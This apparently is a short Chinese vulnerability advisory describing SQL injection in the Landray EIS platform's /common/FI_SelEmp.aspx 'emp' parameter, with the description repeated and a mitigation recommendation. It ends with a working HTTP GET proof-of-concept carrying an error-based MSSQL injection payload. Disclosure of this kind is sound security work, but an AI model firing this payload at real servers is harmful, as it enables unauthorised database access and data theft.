Description
蓝凌EIS智慧协同平台是一款企业级协同办公系统,其/common/FI_SelEmp.aspx接口存在SQL注入漏洞。由于对参数'emp'的输入未进行充分过滤,攻击者可通过构造恶意SQL语句,利用数据库错误回显获取数据库版本等敏感信息。该漏洞利用方式简单,危害严重,可导致企业核心业务数据泄露甚至服务器被控。建议企业立即进行排查修复,应用官方安全补丁或实施输入过滤。
蓝凌EIS智慧协同平台是一款企业级协同办公系统,其/common/FI_SelEmp.aspx接口存在SQL注入漏洞。由于对参数'emp'的输入未进行充分过滤,攻击者可通过构造恶意SQL语句,利用数据库错误回显获取数据库版本等敏感信息。该漏洞利用方式简单,危害严重,可导致企业核心业务数据泄露甚至服务器被控。建议企业立即进行排查修复,应用官方安全补丁或实施输入过滤。
GET /common/FI_SelEmp.aspx?actortype=1&emp=%28CONVERT%28int%2C%28SELECT%20sys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%272638%27%29%29%29%29%29&fillctls=1 HTTP/1.1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.